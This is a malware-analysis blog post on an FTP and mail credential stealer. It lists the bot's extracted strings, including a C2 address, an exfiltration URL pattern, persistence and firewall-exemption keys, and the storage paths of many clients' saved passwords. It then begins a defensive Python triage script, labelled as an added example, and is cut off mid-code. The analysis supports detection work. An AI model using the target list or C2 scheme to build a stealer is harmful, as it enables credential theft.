<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEM1jbL-ZTUh2WDh394t1fMa6GdOU3EbBxiWKuLCxtxmceDcbaYmcX4rIY7t3Q08EQQmcKXL5uWqup5CCXujrBLPSzcWzDEKrEaSN0LgYk12KkgJKNYxXFZJ7BbAip9zmZQyN8i6Mi6eU/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEM1jbL-ZTUh2WDh394t1fMa6GdOU3EbBxiWKuLCxtxmceDcbaYmcX4rIY7t3Q08EQQmcKXL5uWqup5CCXujrBLPSzcWzDEKrEaSN0LgYk12KkgJKNYxXFZJ7BbAip9zmZQyN8i6Mi6eU/s1600/03.png" height="306" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Analysis on V.T.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQfL_KBbujKvmapf_8dCkyGfblbsk_K5h6KpmUnwhQa-jO7gZoz2EUmq3YEkkUgnb0FKb3orneNh8GucM5OQQmD9TgJyQCzkrjM6O2eItnrYK27DrhpCFaF3sWtXX1EeLtNs61zenzr4/s1600/vt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQfL_KBbujKvmapf_8dCkyGfblbsk_K5h6KpmUnwhQa-jO7gZoz2EUmq3YEkkUgnb0FKb3orneNh8GucM5OQQmD9TgJyQCzkrjM6O2eItnrYK27DrhpCFaF3sWtXX1EeLtNs61zenzr4/s1600/vt3.jpg" height="140" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">It contains no obfuscation layer.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Strings:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Text string</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "===="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\microsoft\windows\currentversion"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "VendorId"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "rpcrt4.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "UuidCreate"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\microsoft\windows\currentversion"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "VendorId"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "GetProcAddress"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla 4.0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Accept: text/html,application/xhtml+xml,applicati</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> (Initial CPU selection)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "http://%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "regedit32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Pa</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:*:Enabled:Microsoft Office"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "5629186B-0207-4659-AE5D-B09282932A86"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s_%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s_%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\..\Local\VirtualStore"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "text"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HTTP/1.1"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Content-Encoding: gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Content-Length:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Transfer-Encoding: chunked"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "bhappyland.com"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1)"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ft</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SUCCESS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%08X-%04X-%04X-%02X%02X%02X%02X%02X%02X%02X%02X"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "===="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "WABOpen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\WAB\DLLPath"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Identities"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Identities"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft\Outlook Express"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "*.dbx"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SOFTWARE\Clients\Mail"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SOFTWARE\Clients\Mail\Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MSWQ*.tmp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MSWQ*.tmp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".rar"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".zip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".cab"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".avi"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".mp3"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".jpg"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".gif"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "10"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "11"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "12"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "13"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Config Path"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\VanDyke\SecureFX"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\Sessions"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Hostname"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FTPWare\CoreFTP\Sites"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PW"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "hdfzpysvpzimorhk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DataFolder"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FTPRush"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "RushSite.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\UltraFXP"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Sites.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HOST"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Estsoft\ALFTP\ESTdb2.dat"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Encrypt_PW"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "ID"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "URL"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\Windows\CurrentVersion\Uninsta</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FTP Commander"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FTP Navigator"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "InstallLocation"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "UninstallString"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Ftplist.txt"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Server"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\CoffeeCup Software\Internet\Profiles"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HostName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\TurboFTP\addrbk.dat"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s:%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\SmartFTP\Client 2.0\Favorites"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\*.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;host&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;host&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;/host&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;port&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;port&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;/port&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;user&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;user&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;/user&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;password&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;password&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "&lt;/password&gt;"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "uid"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "pwd"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\ipswitch\ws_ftp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DataDir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\sites\ws_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "GHISLER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Ghisler"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FtpIniName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Install_Dir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "InstallDir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "connections"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "anonymous"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "e-mail"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "general"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "://"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MS IE FTP Passwords"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MS IE FTP Passwords"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DPAPI: "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "acheCredentials"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "WininetCacheCredentials"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "pstorec.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "crypt32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PStoreCreateInstance"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "CryptUnprotectData"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Install_Dir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FileZilla.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Server "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Site "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla\Site Manager"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\GlobalSCAPE"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "sm.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "8."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\GlobalSCAPE\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\GlobalSCAPE\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\QCToolbar"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "QCHistory"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HostName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\far\plugins\ftp\hosts"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\far2\plugins\ftp\hosts"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Win32StopOffMutant"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Win32StopOffMutant"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE ":\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AUTH PLAIN"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "235"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "230"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "OK"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "LOGIN "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d.%d.%d.%d:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d:%s:%s:%d.%d.%d.%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MAIL FROM:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE ":=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "RCPT TO:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "NtQueryInformationProcess"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "ntdll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AllocateAndGetTcpExTableFromStack"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "iphlpapi.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AllocateAndGetUdpExTableFromStack"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "iphlpapi.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "CreateToolhelp32Snapshot"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Process32First"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Process32Next"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span><br />
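<span style="font-family: Arial, Helvetica, sans-serif;">The string list above already tells a defender most of what this module does: a Run key for persistence, an entry added to the Windows Firewall authorized-applications list, a hard-coded C2 address, and the registry keys and configuration files of a dozen FTP and mail clients. The following Python script is an added example, not code from this blog or from the bot: it parses a dump in exactly this format and turns it into a capability and IoC report. The capability categories, the regular expressions and the sample input (a subset of the strings above, constructed so that it includes the truncated lines) are this example's own assumptions, not the author's analysis.</span><br />

```python
"""Capability triage of an OllyDbg-style referenced-strings dump.
Added example, not the blog's own code: it parses 'ASCII "..."' / 'UNICODE "..."'
lines like the listing above and maps them to capabilities a defender cares about.
The category rules are this example's own assumptions drawn from the strings in the
post; they are not a vendor signature or the author's analysis."""
import json
import re
from collections import defaultdict

# Constructed sample: a subset of the strings shown in the post, in the same dump
# format. Three lines are truncated as the debugger printed them (no closing quote).
SAMPLE_DUMP = r'''
 Text string
 ASCII "rpcrt4.dll"
 ASCII "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.
 ASCII "93.113.37.210"
 ASCII "http://%s"
 ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
 ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Pa
 ASCII "%s:*:Enabled:Microsoft Office"
 ASCII "bhappyland.com"
 ASCII "index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ft
 ASCII "Microsoft\Outlook Express"
 ASCII "*.dbx"
 ASCII "Software\FTPWare\CoreFTP\Sites"
 ASCII "Software\FileZilla\Site Manager"
 ASCII "93.113.37.210"
 ASCII "CryptUnprotectData"
 ASCII "Win32StopOffMutant"
 ASCII "AUTH PLAIN"
 ASCII "MAIL FROM:"
 ASCII "NtQueryInformationProcess"
 ASCII "CreateToolhelp32Snapshot"
 UNICODE "=::=::\"
'''

STRING_LINE = re.compile(r'^\s*(ASCII|UNICODE)\s+"(.*)$')
IPV4 = re.compile(r'^(?:\d{1,3}\.){3}\d{1,3}$')
DOMAIN = re.compile(r'^[a-z0-9-]+(?:\.[a-z0-9-]+)+$')
FILE_EXTENSIONS = {"dll", "xml", "ini", "txt", "dat", "tmp", "dbx", "php", "exe"}

# Regexes matched against the lower-cased string (assumed mapping, see docstring).
CAPABILITY_RULES = {
    "persistence": [r"currentversion\\run"],
    "firewall_exemption": [r"sharedaccess\\pa", r":\*:enabled:"],
    "c2_http": [r"^http://", r"index_get\.php", r"^mozilla/"],
    "mail_client_theft": [r"outlook express", r"\*\.dbx", r"\\wab\\"],
    "ftp_client_theft": [r"filezilla|ws_ftp|coreftp|smartftp|ftprush|ultrafxp|alftp",
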